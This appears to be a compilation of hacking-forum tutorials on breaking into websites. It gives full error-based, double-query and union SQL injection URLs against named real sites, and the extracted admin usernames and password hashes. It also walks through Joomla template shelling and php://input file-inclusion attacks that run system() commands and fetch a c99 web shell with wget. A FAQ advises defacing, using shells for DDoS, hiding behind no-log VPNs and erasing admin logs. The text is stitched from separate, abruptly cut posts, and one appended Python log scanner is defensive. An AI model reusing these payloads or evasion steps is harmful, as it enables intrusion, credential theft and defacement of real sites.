For this week's tutorial, we're gonna use two methods of shelling Joomla sites, in case one method doesn't work.
So let's get started.
First Method: Shelling Joomla sites using Templates.
Step 1: Log in to the Joomla administrator panel.
Alright, once we're logged in, navigate to "Extensions" and click "Template manager".
Once you're there, you'll see a bunch of themes you can choose from.
Choose any theme you would like to edit. I suggest you leave the default theme untouched.
Once you've chosen a theme, select it and click "Edit".
Once you have clicked "Edit", click "Edit HTML".
You'll see the source code and the path of the Template once you've clicked "Edit HTML".
Make sure to copy the "Path".
Hey guys,
It's Zer0 and I'll be explaining another type of Error Based SQL injection.
It's definitely another type, but in this case I call it Union-Error based, since it involves UNION SELECT in the queries we're about to use.
So let's get started.
In this example we're gonna be using this site (which a member asked about in -Downfall's thread):
Code:
http://www.seenpm.org/
The vulnerable link would be:
Code:
http://www.seenpm.org/new/index.php?id=151'
Before I go further, let me explain some of the SQL functions we're gonna be using in this tutorial, so that you'll have an idea of how the query works. Please read carefully.
Code:
count(*) = Returns the total number of records in the table/view
group by = Groups the result set of the query by one or more columns
concat = Joins several values into one result column
information_schema = The default (built-in) database that holds metadata about every other database, table and column
table_schema = The database a table belongs to
table_name = The current table name
limit = Limits the number of rows returned
mid() = Extracts a substring (starting position, length) from a text value
See more of the functions here: http://www.w3schools.com/sql/sql_functions.asp
NOTE: Make sure to organize the query if you're just gonna copy and paste! There could be some spaces in between.
Getting the version of their database (2 main ways to do it):
First way:
Query:
Code:
+AND(SELECT COUNT(*) FROM
(SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT
version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))
URL will look like:
Code:
http://www.seenpm.org/new/index.php?id=151+AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))
Results:
Code:
Duplicate entry '5.1.54-msl-usrs-sure2-log1' for key 'group_key'
Second way:
Query:
Code:
+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)-- x
URL will look like:
Code:
http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)-- x
Results:
Code:
Duplicate entry '5.1.54-msl-usrs-sure2-log1' for key 'group_key'
Now that we've got the version, let's extract the database:
Query used:
Code:
+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(schema_name),0x7e)+from+information_schema.schemata limit+0,1),1,25),floor(rand(0)*2)))a)-- x
URL will look like this:
Code:
http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(schema_name),0x7e)+from+information_schema.schemata limit+0,1),1,25),floor(rand(0)*2)))a)-- x
Results:
Code:
Duplicate entry 'information_schema,seenpm_2007~~1' for key 'group_key'
Note: Notice the limit 0,1),1,150)
This is the part where I raised the mid() length from 25 to 150, just in case there were more databases.
I'll explain more about the mid() function in the next step.
We have the database and version so far. Now for the tables in their current database.
Query:
Code:
+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+from+information_schema.tables where table_schema=database() limit+0,1),1,25),floor(rand(0)*2)))a)-- x
URL:
Code:
http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+from+information_schema.tables where table_schema=database() limit+0,1),1,25),floor(rand(0)*2)))a)-- x
Results:
Code:
'links,members,menu,menu_s1' for key 'group_key'
Now read this carefully, and notice how the tables aren't completely shown.
Only about half of them are shown. This is because of the mid() function we're using.
Leave the limit 0,1 part alone and don't touch it.
What you need to alter now are the integers of the mid() function, i.e.
Code:
(mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+from+information_schema.tables where table_schema=database() limit+0,1),1,25)
Yes, that's right. Notice 1,25.
25 (the length) can also be altered; however, it's a moderate value, so leave it like that.
The number "1" is the starting position: as soon as you alter it, a different part of the table list is shown.
Incrementing it is what's needed here.
Let's just say 15,25.
It'll display the rest of the other tables.
I've done a bit of recon on the site and found out that the 'users' table is located at 58,25.
So the query with the URL will look like:
Code:
http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+from+information_schema.tables where table_schema=database() limit+0,1),58,25),floor(rand(0)*2)))a)-- x
Results:
Code:
Duplicate entry 'ers,u_page,u_par,users~~1' for key 'group_key'
Now for the columns in the specified table i.e users
Query:
Code:
+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(column_name),0x7e)+from+information_schema.columns where table_name=0xHex_Table limit+0,1),1,25),floor(rand(0)*2)))a)-- x
URL:
Code:
http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(column_name),0x7e)+from+information_schema.columns where table_name=0x7573657273 limit+0,1),1,25),floor(rand(0)*2)))a)-- x
Now notice the mid() function.
I've incremented from 1,25 to 4,25.
Now to extract the data from the desired columns
Columns we have so far: "username", "password"
Query:
Code:
+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(username,0x3a,password),0x7e)+from+users limit+0,1),1,25),floor(rand(0)*2)))a)-- x
URL:
Code:
http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(username,0x3a,password),0x7e)+from+users limit+0,1),1,25),floor(rand(0)*2)))a)-- x
Results:
Code:
Duplicate entry 'admin:admin,test:test~~1' for key 'group_key'
Notice how I didn't increment the mid() function.
This is because the content is completely shown.
Note: You can tell that the data is completely shown when there is a ~ sign (or signs) at the end.
Introductions
- Hello guys, I'm ZeroFreak and today I'll be posting a couple of questions related to web hacking.
- In the past few days, I've seen a lot of people having trouble and getting stuck at a certain point while they hack.
- Well, most of these "questions" will be answered and hopefully you'll find this thread useful.
I'll be grouping the types of questions to make it easier for you guys to understand what you'll be reading.
Part 1: General Web Hacking FAQ
Question: What is a shell when it comes to web hacking?
Answer: Well, basically a shell is a .php file that needs to be uploaded to a hacked website or a host in order to make it work.
The way it works is not that complex, if you're wondering. With a shell uploaded to your hacked website or host, you can alter almost anything using it.
While you're using a shell, you will be able to:
Delete website directories and upload your deface page
Use it to DDoS another website (depends on what type of shell you're using)
With a shell that has many functions, you can also crack MD5 hashes, modify another php file, mass mail someone, or email bomb an email!
An example of a shell I use is: http://sourceforge.net/projects/ani-shell/
Question: What does defacing mean and what's a deface page?
Answer: Defacing, in most cases, means that you wanna upload a specific file of yours, mostly a message, to prove to the administrator that you hacked the website.
If you think about it, it's relatively similar to a deface page.
A deface page, while hacking a website, is simply a message to convey to the owner of the website that you've owned their security.
Most people do this for fun, fame, or other stuff that can satisfy your hacking skills.
If you're a beginner in web hacking, defacing a site will be considered a big success for you, just like me :)
Question: What's the difference between a shelled website and a defaced website?
Answer: Simply put, a shelled website can be used as hosting for illegal operations, can be used for DDoSing and other functions a shell can perform, while a defaced website simply carries a message, mostly threatening and fun, which conveys to the owner of the website that their security is low and that you owned them.
Question: My IP was logged while I was hacking, what should I do now?!
Answer: Well, first of all, don't ever freak the hell out or piss your pants! Calm down a bit and get your head straight.
Now to the point: if your IP has ever been logged, there is a huge chance that you won't get caught. However, don't be too happy about it.
Try WHOISing the website and see if this website is an important source to the owner. If it is, you might wanna leave the website forever. What I mean is that you can just leave the site alone so that the owner won't get too suspicious of what's happening.
Now for the most important part: next time use a VPN that never saves logs of your activity on the internet.
Examples of VPN:
1. nVPN (paid)
2. ProXPN (free)
You can also use a proxy to keep yourself anonymous.
A piece of advice from me and all other web hackers out there: no matter what you hack, whether it's a bullshit website or a strict government website, always stay behind a VPN or proxy and stay anonymous!
Question: What is a hash and what can I do with it?
Answer: To get to the point, a hash is basically an encryption. To be specific, a special kind of encryption which requires hash cracking knowledge in order to reveal the plain text.
Unlike other encryption, a hash can't be decrypted. In other words, to successfully crack a hash, you either need to use a hash cracking website or an external hash cracking program with an enormous word list.
An example of a website for cracking hashes: http://www.md5decrypter.co.uk/
Program for cracking:
HashCat
Now there are different types of hashes out there, and you can determine what kind of hash it is by studying the number of characters and the types of characters in the code.
To know most of the types of hashes, visit this thread (Credits to Haxor! :) ) http://www.hackforums.net/showthread.php?tid=1393830
Other types of encryption can be decrypted using "http://www.crypo.com"
Question: What is rooting, a.k.a. rooting a server?
Answer: Rooting a server, in simple words, means that you have complete remote access to a server (computer).
Rooting works on the basis of exploits. Most websites are running on Linux servers. Now what will you gain when you root a server?
Easier said than done: you will gain remote control of the websites associated with and run by that server.
It's like hacking more than 1 website at a time.
Rooting can be done with Linux and Windows and is really a hard method of web hacking when you're a newb to it. You can search millions of tutorials out there about rooting, but you might wanna start from the basics first.
Question: Is there any tool that can help me ease my web hacking activity while I hack websites?
Answer: First of all, never use tools that will do the job for you, i.e. hack everything for you! You don't wanna get your ass stuck while you watch a program hack websites for you and you don't learn anything.
Now, there are many useful tools out there that can help you speed up your activity when you start hacking websites. These tools are mostly add-ons installed in a browser called Firefox (which is really a good, famous browser for hacking).
You can use some of the following:
1. HackBar add-on for Firefox:
Has a built in automatic column-number posting when you use UNION SELECT in SQL injection
Tools you need when you XSS
Built-in Text to Hex and Hex to Text
A big space for customizing your queries
2. Cookies Manager:
A very efficient tool for adding/deleting/modifying cookies
Organized layout and a friendly GUI
3. Live HTTP Headers:
Manage all the activities your browser performs, i.e. record the activities your browser is performing live
A very useful tool for uploading shells on a hacked site (used for renaming your shell.php.jpg to shell.php)
Replay the activity on your browser while you alter your cookies to make changes
4. Tamper Data:
Mostly used in LFI (Local File Inclusion)
Instantly records the connections being made in your browser from the websites opened
Question: I'm very new to Web Hacking, I'm confused, where can I start?
Answer: You can start from the very basics to the advanced, but never be in a hurry when you're just starting.
Here's what you can study first:
1. HTML coding
2. PHP
3. Javascript
4. Cookies
Don't work hard on mastering all of them though, just learn the basics and try to get the hang of it.
Once you've got an idea about those four, methods of web hacking are what you're searching for now.
Many methods can be learned and used and some of them are listed below from the easiest to an intermediate level.
1. SQL injection
2. XSS
3. LFI/RFI
I recommend you start from the basics of SQL injection. Then you can progress to further advanced methods of web hacking (more about those methods below).
Question: What are the types of web hacking methods?
Answer: Some of the types are explained below.
1. SQL injection: Queries entered in order to extract information from the database of the website
Error Based SQL injection
Union Based SQL injection
Time Based SQL injection
Blind SQL injection
String Based SQL injection
There's also something called WAF Bypassing, where you bypass the firewalls installed on the website. This can lead to combinations of SQL injection if you think about it. Examples are:
String Based WAF bypassing SQL injection
String-Error Based WAF Bypassing SQL injection
WAF Bypassing Double Query SQL injection
2. XSS (Cross Site Scripting): Execute scripts to perform functions required to hack a website
Persistent - Can be used for cookie stealing
Non-Persistent - Can be used as an HTML injection, commonly used for website vulnerability proofs
3. LFI (Local File Inclusion): Directory exploits used to upload files into the website(example: shells)
/proc/self
Log Poisoning
Malicious Image Upload
This is all I can cover for now. But I'll be making tutorials on web hacking soon.
Question: What should we do before we start to attempt web hacking?
Answer: You might need to do the following when you start hacking websites.
1. Proxy/ VPN (Virtual Private Network)
Always stay behind a proxy or a VPN, no matter how useless or precious the site you're attempting to hack could be.
Proxies can be obtained from here
Note: When using a VPN, always use one that doesn't store logs; it's really a serious matter.
Hack from another Wireless network if possible
2. Expose prevention
Never attempt to share your web hacking activity anywhere or with anyone unless you trust that person, so that you both can discuss and learn together.
Some stranger might report you or blackmail you, and that would really suck.
Question: What should I do after I'm done with hacking the website?
Answer: You don't wanna get caught, reported or traced. Here are some tips.
1. Logs in the admin panel's website
After you're done with everything, i.e. defacing/shelling, make sure to erase the logs created in the panel. There is a possibility your IP could be stored in one of their directories.
2. Erase your tracks
Make sure to delete everything done in your browser, i.e. cookies, logs, logins etc.
You can do this using CCleaner
3. Pride of success
Don't be too proud sharing what you have just done; some people are really not trustworthy and could open up a report anytime.
Be happy with what you've done and share it with the ones you trust.
Hmm, seems like nothing is being displayed, even though I've added a null-byte at the end of the URL.
Well, not to worry, it's time to use our backup method. The "php://input" method will help us read files with certain commands, which enables us to upload a shell.
This can be done using the "Hackbar" or by using "Live HTTP headers".
I'll show you how to exploit via php://input using the "Hackbar".
So let's check what we're supposed to use in the Hackbar.
Now let's try putting this method in action.
Look at the picture carefully.
URL will be:
Code:
http://www.site.com/index.php?page=php://input
and POST DATA:
Code:
<? system('uname -a'); ?>
Other commands
List directories
Code:
<? system('ls'); ?>
Identification
Code:
<? system('id'); ?>
Convert format
Code:
<? system('mv file.txt file.php'); ?>
Alright, let's spawn a shell there now, shall we.
Grab a shell from sh3ll.org or anywhere else.
For now, we'll be using the normal c99 shell:
Code:
http://www.sh3ll.org/c99.txt?
Let's use the "wget" command to spawn our shell on the site.
Alright guys, go scroll up my list and see if you can XSS those sites.
I've collected them so that people can be eager to train more and understand the concept of XSS
Don't be bothered reporting anything, cause I've reported all of those sites and I didn't get a single response.
Alright, since my previous tutorials haven't had as many responses as I expected, due to people who aren't fond of reading big tutorials, I've decided I won't make this tutorial big. As a matter of fact, I'll just make you understand the concepts behind String Based SQL injection. I KNOW there are a lot of tutorials that would be the same as this one, but I guarantee that if you read this, you won't have any doubts on String Based.
What is String Based SQL injection and how do you notice it?
To make this simple to understand, String Based SQL injection happens when the site is vulnerable to SQL injection but doesn't show us the results that should be displayed after executing our SQLi query.
Commonly known symptoms that prove the site is vulnerable to String Based are:
Code:
"order by" doesn't work, example: order by 100--
"group by" doesn't work
"having 1=2" doesn't work
queries related to SQL injection don't work (the site will show a normal page even though it is vulnerable to SQLi)
Solution to this issue, in order to hack a site with String Based SQL injection
The answer to this problem is to use the following format while trying to hack a site with SQLi:
Code:
http://site.com/index.php?id=10' order by 1000--+
That will show us the error, hence displaying the results according to our query.
The point here is that we used the quote ' and the + sign in our query:
Code:
id=X' order by--+
Alright, now that you've got the point, let's try String Based on some of the other types of SQL injection, shall we.
String-Union Based SQL injection
1. Obtaining the number of columns (in this example, we'll use 10 columns)
Code:
http://www.site.com/index.php?id=234' order by 11--+
Results show an error, so we'll assume 10 columns, since it's an example for our process.
2. Obtaining the Databases
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from information_schema.schemata--+
Results will display the databases on their website.
Note: If you don't know anything about UNION Based SQL injection, I suggest you read one of my tutorials to progress further in this step.
3. Obtaining the Tables from the current Database
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(table_name,0x0a),7,8,9,10 from information_schema.tables where table_schema=database()--+
Results will display the current table names.
For this example, we'll be using the table name: "admin"
4. Obtaining Column names from a specific table (which in this example is "admin")
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from information_schema.columns where table_name=0x61646d696e--+
For this example, we'll use "username" and "password" as our column names.
5. Obtaining Data from Column names
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+
Results will display the data from the columns you have chosen.
This can also be done with Error Based SQL injection, Blind Based and other types of SQL injection.
Please refer to my previous tutorials to know more about Error Based and Union Based.
This will be considered a mini tutorial for String Based SQL injection. I just hope people are gonna understand this as much as they need on their journey through SQL injection.
Hope you guys enjoy this. It's pretty much the concept that is needed when you SQLi.
End of Chapter 5
Upcoming Chapter: Blind Based SQL Injection Detailed
Contact me via PM
or
Email: zerofreak@live.com
Have a great day
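As an added defensive example (not code from the original posts), here is a Python scanner that reads constructed Apache-style access-log lines and flags the request patterns used in the Union-Error, String Based and php://input walkthroughs above: the floor(rand(0)*2) + GROUP BY duplicate-key trick, information_schema lookups, UNION SELECT, the ' order by N-- probe and php:// stream wrappers. It also checks whether a response body leaks the MySQL 'Duplicate entry ... for key group_key' error those techniques depend on; the log lines, addresses and paths are constructed.

```python
import re
from typing import Dict, List
from urllib.parse import unquote_plus

# Constructed Apache-style access-log lines (not taken from the original posts):
# a benign request, a union-error payload, a string-based probe and a
# php://input wrapper request. The IPs are documentation addresses.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2013:11:02:14 +0000] "GET /new/index.php?id=151 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Mar/2013:11:02:19 +0000] "GET /new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)--+x HTTP/1.1" 200 612
203.0.113.7 - - [10/Mar/2013:11:03:40 +0000] "GET /index.php?id=10%27%20order%20by%201000--+ HTTP/1.1" 500 88
198.51.100.3 - - [10/Mar/2013:11:05:01 +0000] "POST /index.php?page=php://input HTTP/1.1" 200 300
"""

# Common Log Format: client, ident, user, [timestamp], "METHOD target PROTO", status, size.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Request-side signatures of the techniques shown in the tutorials.
RAND_FLOOR = re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)")  # duplicate-key trigger
GROUP_BY = re.compile(r"\bgroup\s+by\b")
INFO_SCHEMA = re.compile(r"\binformation_schema\.(?:tables|columns|schemata)\b")
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b")
STRING_PROBE = re.compile(r"'\s*(?:order|group)\s+by\s+\d+\s*--")  # id=X' order by N--+
PHP_WRAPPER = re.compile(r"\bphp://\w+")  # php://input and friends

# Response-side signature: the MySQL error that error-based extraction reads data from.
GROUP_KEY_ERROR = re.compile(r"Duplicate entry '.*' for key '?group_key'?")


def decode_target(target: str) -> str:
    """URL-decode a request target (twice, to catch double encoding), turning '+'
    into spaces as the tutorial payloads rely on, then lower-case and collapse
    whitespace so the signatures match reliably."""
    decoded = target
    for _ in range(2):
        decoded = unquote_plus(decoded)
    return re.sub(r"\s+", " ", decoded).lower()


def classify(decoded: str) -> List[str]:
    """Return the technique labels matched by a decoded request target."""
    hits = []
    if RAND_FLOOR.search(decoded) and GROUP_BY.search(decoded):
        hits.append("error_based_duplicate_key")
    if INFO_SCHEMA.search(decoded):
        hits.append("information_schema_enum")
    if UNION_SELECT.search(decoded):
        hits.append("union_select")
    if STRING_PROBE.search(decoded):
        hits.append("string_based_probe")
    if PHP_WRAPPER.search(decoded):
        hits.append("php_stream_wrapper")
    return hits


def scan_log(text: str) -> List[Dict]:
    """Parse access-log lines and report every request that matches a signature."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in Common Log Format
        hits = classify(decode_target(m.group("target")))
        if hits:
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "status": int(m.group("status")),
                "target": m.group("target"),
                "hits": hits,
            })
    return findings


def leaks_group_key_error(body: str) -> bool:
    """True if a response body exposes the 'Duplicate entry ... for key group_key'
    error: an application returning this to clients is leaking database output."""
    return GROUP_KEY_ERROR.search(body) is not None


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['time']} {f['status']} {', '.join(f['hits'])}")
```

If the response check fires on a production page, the application is returning raw database errors to clients; turning off display_errors and switching to parameterized queries removes both the leak and the injection.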
Alright, I'll make this tutorial as short as possible so that you can understand faster.
Understanding Error Based/Double Query
How do Error Based and Double Query work?
Error Based:
Code:
A method of extracting information from a database when the UNION SELECT function does not work at all. This can be done using a compiled query to extract the database information.
Double Query:
Code:
Basically like Error Based, except that the Error Based query will be doubled into a single query statement so that we'll get errors with information in them.
I'll explain further in this tutorial.
Anyways, focus on this part of the tutorial: Error Based IS Double Query. Error Based = Double Query (Error Based 2x).
How do you know you should use Error Based/Double Query? (Important!)
This is the most important part of web hacking: the type of injection to use in different situations.
You can use Error Based/Double Query injections when you get the following errors:
Code:
a. The Used Select Statements Have Different Number Of Columns.
b. Unknown Column 1 or no columns at all (in webpage and page source)
c. Error #1604
Now take note of those errors. You'll be needing them.
Let's start with Error Based SQL injection
Alright, for this lesson we'll use this site as an example: http://www.aliqbalschools.org
First approach is knowing the version of the database.
To do that we enter this query after the end of the URL:
Code:
or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--
So the site will look like this
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--
Results:
Now that we know the version of the database, which is 5, let's move to the next step.
Second step: Getting the database name
To get the database, we enter this query:
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Notice the limit function in the query.
A website can have more than two databases, so increase the limit until you find all database names.
Example: limit 0,1 or limit 1,1 or limit 2,1
Now our website address will look like this:
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Results:
Database is: iqbal_iqbal
Second step is done, where we extracted the database names we need.
MAKE sure you write the database name on paper or in notepad.
We'll need it later.
Third Step: Getting the TABLE NAMES
Table names are what we need now.
Here's the query we can use:
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Also, don't forget the LIMIT function we used here to get table names one by one.
Alright, our web address will look like this:
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Now here's the important part:
When you search for tables, keep incrementing the limit until you find the valuable table name.
For example: LIMIT 0,1
LIMIT 1,1
LIMIT 2,1
Keep increasing the number until you find the table you want to extract the information from.
Here's the formula: LIMIT N,1 where N is an integer you increment
Valuable Tables can be:
Code:
Users
Admin
user
administrator
tbladmin
tblusers
settings
In this case, we have the table "settings".
So now we know our table, let's move on to the next step.
Fourth Step: Getting Columns from specific TABLE NAMES
Alright, now that you've chosen the table you wanna extract columns from, time to execute another query.
So here's how a column extraction query will look:
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLEHEX limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Notice the LIMIT 0,1 function and 0xTABLEHEX.
You need to convert your specific table name into hex and add 0x at the beginning of the string so that it can be read by the website.
To convert a string to hex use: http://www.swingnote.com/tools/texttohex.php
Here's how the address will look along with the query:
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Results:
Code:
Duplicate entry 'Id~1' for key 'group_key
Now you need to increment the limit until you find valuable columns such as userName and passWord.
So in this case,
Column name = userName
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Column name= passWord
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Again, don't forget to look at the LIMIT function.
Now that we've found the columns we want to extract information from, i.e. "userName" and "passWord", let's proceed to the next step where we can actually get the login username and password.
Fifth Step: Extracting the data from Columns
Alright, this part is probably the best in SQL injecting a site.
Time to get the info from the columns we have.
To do that, use this query:
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME,0x7e,COLUMN_NAME) as char),0x7e)) from Databasename.TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Now before you proceed, watch and focus on the code and study what happens.
Here we have 4 variables:
1. COLUMN_NAME: where you insert the column name you want to extract information from
2. Databasename: where you insert the current database name of the website so that you'll be extracting info from it
3. TABLENAME: where you insert the table name the column names were extracted from
4. LIMIT N,1: the LIMIT function, where N is an integer you increment
Now let's do some replacing, FOCUS:
Code:
COLUMN_NAME replace with "userName" and "passWord"
Databasename replace with "iqbal_iqbal"
TABLENAME replace with "settings"
After you're done altering the code to your needs for extracting information, time to execute it.
Here's what the code will look like:
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Results:
Code:
Duplicate entry 'admin~86f574c1d63d53fa804c13c3213953d9~1' for key
SUCCESS, you injected the site with error based; now you have the login info.
Username: admin
Password: 86f574c1d63d53fa804c13c3213953d9
Go to http://www.md5decrypter.co.uk/ to crack that MD5 hash.
Now let's start with DOUBLE Query SQL injection
So basically, as stated above, DOUBLE Query is the same as Error Based, except the query we'll enter is gonna be double the normal error based query.
First off, the definition so that you can understand:
Code:
Double query SQL injection is a vulnerability that uses two queries together wrapped into one that confuses the db to a point where it spits out an error. This error gives us the info we need to leverage the database all the way to the admin panel. As a matter of fact we can pretty much dump the whole database if we want.
Differences:
Error Based Query for Database Extraction:
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Double Query for Database Extraction:
Code:
and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Now you get the idea, let's cut to the chase and go on.
We'll be using the same site as above.
Step 1: Getting the database version
Alright, same as Error Based, here's the Double query:
Code:
and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
So our address will look like this:
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
NOTE (IMPORTANT): Make sure your query is on one line with single spaces when you paste it into the address bar. Stray line breaks or doubled spaces from copy-pasting give you a plain syntax error instead of the "Duplicate entry" error that carries the data.
Results after query execution:
Code:
Duplicate entry '~'5.1.56-log'~1' for key 'group_key'
The value sits between the ~' and '~ delimiters we added; the trailing 1 is just the floor(rand(0)*2) part of the group key. So the database is MySQL version 5.1.56.
You can test on the site now if you want so that you won't get confused
Step2: Getting the Database
Now we've got the version, lets execute a double query on extracting the database
Query for Database extraction:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Notice the LIMIT clause again and make sure you don't make mistakes in that
It reads LIMIT N,1 where N is the row offset, starting at 0: LIMIT 0,1 returns the first schema, LIMIT 1,1 the second, and so on. Increment N by one per request to walk through the rows one at a time; when N runs past the last row the inner select returns NULL and the page comes back without the error.
Here's what our address will then look like:
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Once more, don't forget about the LIMIT Function
So here's the results:
Code:
iqbal_iqbal
Now that's their database.
Note it down on a notepad or a paper
Step3: Getting the Table Names
As I've explained above, we'll be also using the LIMIT Function in this query.
Just a quick look, the query will look like this:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where
table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1
Alright you need to focus on the code and see the changes.
There are two variables here: 1. Hex code of the database name 2. LIMIT Function
